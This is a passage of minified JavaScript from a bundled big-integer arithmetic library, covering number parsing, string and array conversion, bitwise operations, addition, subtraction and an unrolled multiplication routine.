v=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(v++,this.negative=1),v<l.length&&(16===f?this._parseHex(l,v,A):(this._parseBase(l,f,v),"le"===A&&this._initArray(this.toArray(),f,A)))},I.prototype._initNumber=function(l,f,A){l<0&&(this.negative=1,l=-l),l<67108864?(this.words=[67108863&l],this.length=1):l<4503599627370496?(this.words=[67108863&l,l/67108864&67108863],this.length=2):($(l<9007199254740992),this.words=[67108863&l,l/67108864&67108863,1],this.length=3),"le"===A&&this._initArray(this.toArray(),f,A)},I.prototype._initArray=function(l,f,A){if($("number"==typeof l.length),l.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(l.length/3),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var P,G,X=0;if("be"===A)for(v=l.length-1,P=0;v>=0;v-=3)this.words[P]|=(G=l[v]|l[v-1]<<8|l[v-2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===A)for(v=0,P=0;v<l.length;v+=3)this.words[P]|=(G=l[v]|l[v+1]<<8|l[v+2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,A){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var X,P=0,G=0;if("be"===A)for(v=l.length-1;v>=f;v-=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(v=(l.length-f)%2==0?f+1:f;v<l.length;v+=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,A){this.words=[0],this.length=1;for(var v=0,P=1;P<=67108863;P*=f)v++;v--,P=P/f|0;for(var G=l.length-A,X=G%v,L=Math.min(G,G-X)+A,h=0,R=A;R<L;R+=v)h=g(l,R,R+v,f),this.imuln(P),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h);if(0!==X){var J=1;for(h=g(l,R,l.length,f),R=0;R<X;R++)J*=f;this.imuln(J),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h)}this.strip()},I.prototype.copy=function(l){l.words=new Array(this.length);for(var f=0;f<this.length;f++)l.words[f]=this.words[f];l.length=this.length,l.negative=this.negative,l.red=this.red},I.prototype.clone=function(){var l=new I(null);return this.copy(l),l},I.prototype._expand=function(l){for(;this.length<l;)this.words[this.length++]=0;return this},I.prototype.strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var A=z.length+l.length|0;f.length=A,A=A-1|0;var v=0|z.words[0],P=0|l.words[0],G=v*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h<A;h++){for(var R=L>>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(v=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var A;if(f=0|f||1,16===(l=l||10)||"hex"===l){A="";for(var v=0,P=0,G=0;G<this.length;G++){var X=this.words[G],L=(16777215&(X<<v|P)).toString(16);A=0!=(P=X>>>24-v&16777215)||G!==this.length-1?b[6-L.length]+L+A:L+A,(v+=2)>=26&&(v-=26,G--)}for(0!==P&&(A=P.toString(16)+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];A="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);A=(J=J.idivn(R)).isZero()?Z+A:b[h-Z.length]+Z+A}for(this.isZero()&&(A="0"+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return $(void 0!==Q),this.toArrayLike(Q,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,A){var v=this.byteLength(),P=A||Math.max(1,v);$(v<=P,"byte array longer than desired length"),$(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h<P;h++)X[h]=0}else{for(h=0;h<P-v;h++)X[h]=0;for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[P-h-1]=L}return X},I.prototype._countBits=Math.clz32?function(l){return 32-Math.clz32(l)}:function(l){var f=l,A=0;return f>=4096&&(A+=13,f>>>=13),f>=64&&(A+=7,f>>>=7),f>=8&&(A+=4,f>>>=4),f>=2&&(A+=2,f>>>=2),A+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,A=0;return 0==(8191&f)&&(A+=13,f>>>=13),0==(127&f)&&(A+=7,f>>>=7),0==(15&f)&&(A+=4,f>>>=4),0==(3&f)&&(A+=2,f>>>=2),0==(1&f)&&A++,A},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;f<this.length;f++){var A=this._zeroBits(this.words[f]);if(l+=A,26!==A)break}return l},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(l){return 0!==this.negative?this.abs().inotn(l).iaddn(1):this.clone()},I.prototype.fromTwos=function(l){return this.testn(l-1)?this.notn(l).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(l){for(;this.length<l.length;)this.words[this.length++]=0;for(var f=0;f<l.length;f++)this.words[f]=this.words[f]|l.words[f];return this.strip()},I.prototype.ior=function(l){return $(0==(this.negative|l.negative)),this.iuor(l)},I.prototype.or=function(l){return this.length>l.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var A=0;A<f.length;A++)this.words[A]=this.words[A]&l.words[A];return this.length=f.length,this.strip()},I.prototype.iand=function(l){return $(0==(this.negative|l.negative)),this.iuand(l)},I.prototype.and=function(l){return this.length>l.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,A;this.length>l.length?(f=this,A=l):(f=l,A=this);for(var v=0;v<A.length;v++)this.words[v]=f.words[v]^A.words[v];if(this!==f)for(;v<f.length;v++)this.words[v]=f.words[v];return this.length=f.length,this.strip()},I.prototype.ixor=function(l){return $(0==(this.negative|l.negative)),this.iuxor(l)},I.prototype.xor=function(l){return this.length>l.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){$("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),A=l%26;this._expand(f),A>0&&f--;for(var v=0;v<f;v++)this.words[v]=67108863&~this.words[v];return A>0&&(this.words[v]=~this.words[v]&67108863>>26-A),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){$("number"==typeof l&&l>=0);var A=l/26|0,v=l%26;return this._expand(A+1),this.words[A]=f?this.words[A]|1<<v:this.words[A]&~(1<<v),this.strip()},I.prototype.iadd=function(l){var f,A,v;if(0!==this.negative&&0===l.negative)return this.negative=0,f=this.isub(l),this.negative^=1,this._normSign();if(0===this.negative&&0!==l.negative)return l.negative=0,f=this.isub(l),l.negative=1,f._normSign();this.length>l.length?(A=this,v=l):(A=l,v=this);for(var P=0,G=0;G<v.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+(0|v.words[G])+P),P=f>>>26;for(;0!==P&&G<A.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+P),P=f>>>26;if(this.length=A.length,0!==P)this.words[this.length]=P,this.length++;else if(A!==this)for(;G<A.length;G++)this.words[G]=A.words[G];return this},I.prototype.add=function(l){var f;return 0!==l.negative&&0===this.negative?(l.negative=0,f=this.sub(l),l.negative^=1,f):0===l.negative&&0!==this.negative?(this.negative=0,f=l.sub(this),this.negative=1,f):this.length>l.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var v,P,A=this.cmp(l);if(0===A)return this.negative=0,this.length=1,this.words[0]=0,this;A>0?(v=this,P=l):(v=l,P=this);for(var G=0,X=0;X<P.length;X++)G=(f=(0|v.words[X])-(0|P.words[X])+G)>>26,this.words[X]=67108863&f;for(;0!==G&&X<v.length;X++)G=(f=(0|v.words[X])+G)>>26,this.words[X]=67108863&f;if(0===G&&X<v.length&&v!==this)for(;X<v.length;X++)this.words[X]=v.words[X];return this.length=Math.max(this.length,X),v!==this&&(this.negative=1),this.strip()},I.prototype.sub=function(l){return this.clone().isub(l)};var D=function(l,f,A){var L,h,R,v=l.words,P=f.words,G=A.words,X=0,J=0|v[0],Z=8191&J,ue=J>>>13,Ie=0|v[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|v[2],He=8191&Xe,Be=Xe>>>13,qe=0|v[3],De=8191&qe,Ve=qe>>>13,ze=0|v[4],me=8191&ze,Ke=ze>>>13,rt=0|v[5],Ge=8191&rt,Qe=rt>>>13,ht=0|v[6],mt=8191&ht,lt=ht>>>13,ft=0|v[7],xe=8191&ft,We=ft>>>13,Je=0|v[8],Oe=8191&Je,Te=Je>>>13,Le=0|v[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,fa=0|P[2],Jt=8191&fa,Gt=fa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;A.negative=l.negative^f.negative,A.length=19;var ua=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ua>>>26)|0,ua&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ua,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function 